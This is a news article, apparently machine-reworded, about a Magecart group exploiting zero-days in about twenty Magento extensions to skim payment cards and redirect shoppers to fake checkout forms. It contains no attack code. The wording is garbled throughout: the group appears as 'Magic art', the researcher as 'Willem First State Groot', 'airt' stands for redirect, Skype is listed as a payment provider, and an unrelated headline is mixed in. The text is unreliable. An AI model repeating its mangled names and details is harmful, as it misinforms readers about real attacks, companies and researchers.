Magic art cluster leverages zero-days in twenty Magento extensions

Magento won’t ditch the bug bounty online program

Magic art cluster leverages zero-days in twenty Magento extensions

Hackers are abusing unpatched zero-day vulnerabilities in around twenty Magento extensions to plant payment card skimmers on online stores, consistent with Dutch security knowledgeable Willem First State Groot. The investigator has been following this recent campaign however solely known 2 of the twenty extensions that hackers are targeting have.


He is currently asking the broader InfoSec and net development community for facilitating in distinguishing the opposite eighteen extensions, therefore he will give notice developers and have the zero-days mounted.
The investigator has listed a series of computer address ways through those hackers are exploiting the zero-days to realize footholds on stores running the vulnerable extensions.

Webcooking_SimpleBundle Magento extension

Web cooking the maker of the Webcooking_SimpleBundle Magento extension, one among the 2 extensions First State Groot has already known by name, has already shipped out a fix, hours when the investigator reached out. The second extension known by name was TB Rewards, that has been abandoned some months back, and that ought to be uninstalled from all stores because of the present security risk.

Hackers are making pretend checkout Magento forms:

The cluster using this assortment of Magento extension zero-days is one among the teams half-tracked beneath the umbrella term of Magic art. Magic art attacks are happening for the past 3 years, however, they need intense and grew bolder this year when some attacks wedged larger entities, like Ticketmaster, British Airways, and Newegg.
While ab initio there was just one Magecart cluster behind attacks, many completely different actors are currently active mistreatment the identical procedure.
De Groot says the cluster behind the Magento extensions zero-days campaign is additionally quite clever. The hackers are not content with injecting a script on hacked that steals payment card knowledge from checkout forms, like most alternative Magic art teams.
In cases wherever the shop owner handles card payments via external suppliers (such as PayPal or Skype) or does not handle card payments in the least, this cluster can airt store guests to a pretend checkout type that they created advisedly.

Back to top